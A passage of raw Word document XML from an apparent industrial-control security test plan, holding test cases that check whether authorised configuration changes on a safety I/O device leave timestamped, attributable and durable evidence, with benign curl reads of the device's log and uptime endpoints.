          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="39445D7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B8DCA2A" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59916108" w14:textId="0BE06B0B" w:rsidR="00B73A1A" w:rsidRPr="006643DB" w:rsidRDefault="00782C5E" w:rsidP="00655E93">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EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00782C5E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC0901_log_base.json, TC0901_iandm_base.txt (REVISION_COUNTER + I&amp;M4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E1593B4" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE0D088" w14:textId="0B2FB238" w:rsidR="00961DBA" w:rsidRPr="006868A2" w:rsidRDefault="00961DBA" w:rsidP="003A144C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC6357">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ009-02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC6357">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Config-Modification Evidence &amp; Asymmetric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DB831D" w14:textId="77777777" w:rsidR="00961DBA" w:rsidRPr="006868A2" w:rsidRDefault="00961DBA" w:rsidP="003A144C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F37CD4C" w14:textId="3AACCA59" w:rsidR="003A144C" w:rsidRPr="006868A2" w:rsidRDefault="003A144C" w:rsidP="003A144C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006868A2">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3A144C" w14:paraId="516C5E1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CBB268" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4387F26F" w14:textId="77777777" w:rsidR="003A144C"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3A144C" w14:paraId="6588348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61B8E6" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50FF19A8" w14:textId="1792BFA8" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00AA26F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A26F3">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ009-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="517C11A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553C123" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="692527FD" w14:textId="478047B0" w:rsidR="003A144C" w:rsidRPr="006868A2" w:rsidRDefault="001D682D"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ-009 → CR 2.8 / CR 2.11 / CR 3.9 → Asset B, Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00D67CA6" w14:paraId="0948E3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BE9129" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CD382AC" w14:textId="3703F1CD" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="001D682D"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Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w14:paraId="44FBF4C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C59838D" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="211886E6" w14:textId="3A96F1B2" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="001D682D"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SVV_2 (Threat-Mitigation Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="768AA3C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0E969BB" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6589E7B3" w14:textId="298E2B84" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00B172E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172EE">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that a configuration modification (a) increments REVISION_COUNTER and changes the iParCRC/I&amp;M4 signature, but (b) carries no timestamp and no device-side actor, and (c) that after a cold start the REVISION_COUNTER persists (durable count) while the Error-Log event detail is cleared (volatile detail)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00B172EE">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> proving the config-evidence is asymmetric and insufficient for CR 2.11/3.9.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="0DEA530D"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FB9FCC2" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75824EDD" w14:textId="77777777" w:rsidR="00AF6C4E" w:rsidRDefault="00AF6C4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F6C4E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Baseline REVISION_COUNTER, I&amp;M4, Error Log, uptime. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C78EE4F" w14:textId="77777777" w:rsidR="00AF6C4E" w:rsidRDefault="00AF6C4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F6C4E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Perform an authorised iPar change via the F-Host. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36857865" w14:textId="77777777" w:rsidR="00AF6C4E" w:rsidRDefault="00AF6C4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F6C4E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Re-read: confirm counter +1 and I&amp;M4 change; check for any timestamp/actor. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79EC3009" w14:textId="77777777" w:rsidR="00AF6C4E" w:rsidRDefault="00AF6C4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F6C4E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Cold-start. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2274DE" w14:textId="39688612" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00AF6C4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F6C4E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5. Re-read: confirm counter retained but Error Log cleared and uptime reset.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="219A6D0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80CA80" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74E573DA" w14:textId="748149E5" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00E02388"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E02388">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Gap-characterisation test. Expected: counter increments and I&amp;M4 changes (config-change that recorded), no time/actor present, and after cold start the counter survives while log detail is lost → confirms G-2/G-3, recorded as a FAIL on the who/when/retention limbs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C548E1D" w14:textId="77777777" w:rsidR="003A144C" w:rsidRPr="00AF57B2" w:rsidRDefault="003A144C" w:rsidP="003A144C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DCC4B5" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="003A144C">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3A144C" w14:paraId="368CCB8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302E2" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69427B9B" w14:textId="77777777" w:rsidR="003A144C"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3A144C" w14:paraId="7117D2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2694BFE" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C952777" w14:textId="01385D6C" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="005718C9"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718C9">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ009-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="61F5E82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9E2240D" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="338DCCC8" w14:textId="165EADF2" w:rsidR="003A144C" w:rsidRPr="006868A2" w:rsidRDefault="00BE1256"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6868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>SPS 192.168.0.1, DUT 192.168.0.2; Pi mgmt eth1 = 192.168.50.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="50A47A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D6FACD" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F6068E2" w14:textId="59A96A75" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="003E4287"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E4287">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TIA Portal (authorised iPar change); curl + PN acyclic read; power switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="4CB5B585"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1099B04" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E8F6EA7"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 TC-RQ009-02 Config change -&gt; evidence -&gt; persistence across cold start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F94F2C2"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 (pre) capture REVISION_COUNTER, I&amp;M4, error log, uptime</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6031BA24"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curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC0902_log_pre.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EBEE3B9"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curl -s http://192.168.0.2/systemtime/systick -o TC0902_tick_pre.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C331895"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lastRenderedPageBreak/>
              <w:t># ... read I&amp;M0 REVISION_COUNTER + I&amp;M4 via PN -&gt; TC0902_iandm_pre.txt ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F42E704"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 --- authorised iPar change in TIA (e.g., Filter F-DI1 5ms-&gt;10ms), download ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04A56AF5" w14:textId="77777777" w:rsidR="00402BE5" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC0902_log_chg.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5904FF10"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 ... re-read I&amp;M0/I&amp;M4 -&gt; TC0902_iandm_chg.txt (expect counter+1, I&amp;M4 changed, NO time/actor) ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FB9DC49"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 --- COLD START ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08449D56"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curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC0902_log_cold.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B54A44A"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curl -s http://192.168.0.2/systemtime/systick -o TC0902_tick_cold.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="788CCD87" w14:textId="2B4F8AC0" w:rsidR="003A144C" w:rsidRPr="006643DB"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 ... re-read REVISION_COUNTER -&gt; expect RETAINED; log expect CLEARED; tick</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> reset---</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="06894C6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01845B" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F3F9D7B" w14:textId="36EA67F9" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="007131F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131F1">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Counter +1 and I&amp;M4 changed (SRIO-3002/3011); no timestamp/actor; after cold start counter retained, Error Log cleared (SRIO-6521), uptime reset (SRIO-15398).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="57B9356E"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C45DC25" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F1B5C84" w14:textId="78A1CB09" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="007131F1"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Counter durable/ Log detail volatile/ No time/actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="5293D3F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439200" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7645106B" w14:textId="005D209B" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00D23435"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D23435">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC0902_log_pre/chg/cold.json, TC0902_iandm_* reads, TC0902_tick_pre/cold.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="581EC351" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35B55665" w14:textId="70297E50" w:rsidR="0011719C" w:rsidRDefault="0011719C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC6357">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ009-03 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC6357">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Actor Attribution Is Delegated, Not Device-Resident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142E8A77" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="003A144C">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3A144C" w14:paraId="37D68ADC"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82C169" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B42AC3E" w14:textId="77777777" w:rsidR="003A144C"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3A144C" w14:paraId="70C01B3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99E693" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="772F6845" w14:textId="4D49DBBA" w:rsidR="003A144C" w:rsidRPr="006643DB" w:rsidRDefault="00E43349"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43349">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ009-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="00EE7A74" w14:paraId="606B1EC2"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4E132CD" w14:textId="77777777" w:rsidR="003A144C" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E6694E7" w14:textId="1AA0720B" w:rsidR="003A144C" w:rsidRPr="006868A2" w:rsidRDefault="00E6134D"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da-DK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="da-DK"/>
              </w:rPr>
              <w:t>RQ-009 → CR 2.12 → Asset B, Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
